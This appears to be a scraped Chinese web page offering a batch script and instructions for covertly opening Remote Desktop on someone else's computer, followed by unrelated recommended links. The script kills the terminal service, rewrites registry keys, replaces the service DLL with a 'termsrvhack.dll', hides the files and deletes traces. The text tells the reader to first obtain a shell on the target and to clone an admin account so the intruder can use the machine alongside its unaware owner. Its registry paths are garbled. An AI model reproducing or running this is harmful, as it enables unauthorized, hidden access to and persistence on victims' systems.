@ntsd -c q -p "pid"
@reg add HKLMSOFTWAREMicrosoftWindows" "NTCurrentVersionWinlogon /v KeepRASConnections /t REG_SZ /d 1 /f
@reg add HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@reg add HKLMSYSTEMCurrentControlSetcontrolterminal" "serverLicensing" "Core /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
@reg add HKLMSYSTEMCurrentControlSetServicesTermServiceParameters /v serviceDll /t REG_EXPAND_SZ /d %SystemRoot%system32termsrvhack.dll /f
@copy c:termsrvhack.dll c:windowssystem32dllcachetermsrvhack.dll
@attribhsr c:windowssystem32dllcachetermsrvhack.dll
@copy c:termsrvhack.dll c:windowssystem32termsrvhack.dll
@attribhsr c:windowssystem32termsrvhack.dll
@shutdown -a
@del c:termsrvhack.dll
@net start termservice
@del c:3389.bat
其中“pid”是要替換成TermService服務的PID號,可以用命令tasklist/svc命令得到 。當然win2000和以下系統(tǒng)是沒有tasklist命令的 。
具體的操作方法是:先要得到對方的一個SHELL,然后在shell下用第三方軟件打開終端服務,先不要改變默認的3389端口,不然要重起后才登陸,再建一個或克隆一個超級管理員用戶 。
接下來把下載好的termsrvhack.dll和上面的批處理傳到對方的C盤根目錄下,然后在shell下運行此批處理 。提示成功!
最后打開登陸器,3389終端登陸!
說明一下你登陸進去后在里面的操作和那臺電腦的主人操作是互不影響的,他玩他的,你玩你的,呵呵,爽伐?!

推薦閱讀

• 

  太原哪里有圖書批發(fā)市場啊
• 

  品牌梳理與定位 品牌相關知識
• 

  win10攝像頭無法打開怎么辦 win10攝像頭無法使用解決辦法
• 

  寶馬x3踏板安裝方法是什么
• 

  aj黑曜石和黑白熊貓的區(qū)別是什么
• 

  橙子和柚子的區(qū)別 橙子和柚子有什么不同
• 

  佳能70d的快門速度是多少 佳能70d的快門速度是多少啊
• 

  電腦本機用戶怎么登錄密碼忘了怎么辦 電腦本機用戶登錄及忘記密碼的操作步驟介紹
• 

  iphone11home鍵怎么調(diào)出來
• 

  眾泰t500一公里多少錢 眾泰t500高配多少錢
• 

  工作中導致他人受傷由誰來賠付
• 

  開網(wǎng)約車需要什么條件及流程
• 

  世界上有多少種氣候類型
• 

  mate 7，華為mate7怎么樣
• 

  為什么兔子發(fā)抖
• 

  扶綏哪里可以跑步,廣西持續(xù)破解健身去哪兒難題

• 輕快pdf閱讀器怎么實現(xiàn)電腦手機互傳文件？電腦手機互傳文件操作方法分享
• 將XP與Vista裝在同一分區(qū) 且XP不中毒
• Windows XP操作系統(tǒng)中隱藏的20個秘密
• win10取消打開文件出現(xiàn)“在商店中查找應用”窗口提示的方法
• 什么樣的屋頂容易在大風中受損
• 用Sysprep自動實現(xiàn)Windows XP成功部署
• 電機沒勁是什么原因
• 有鳥中熊貓之稱的是
• 途有餓殍而不知發(fā)中發(fā)的意思
• Windwos XP系統(tǒng)中把鼠標玩出新花樣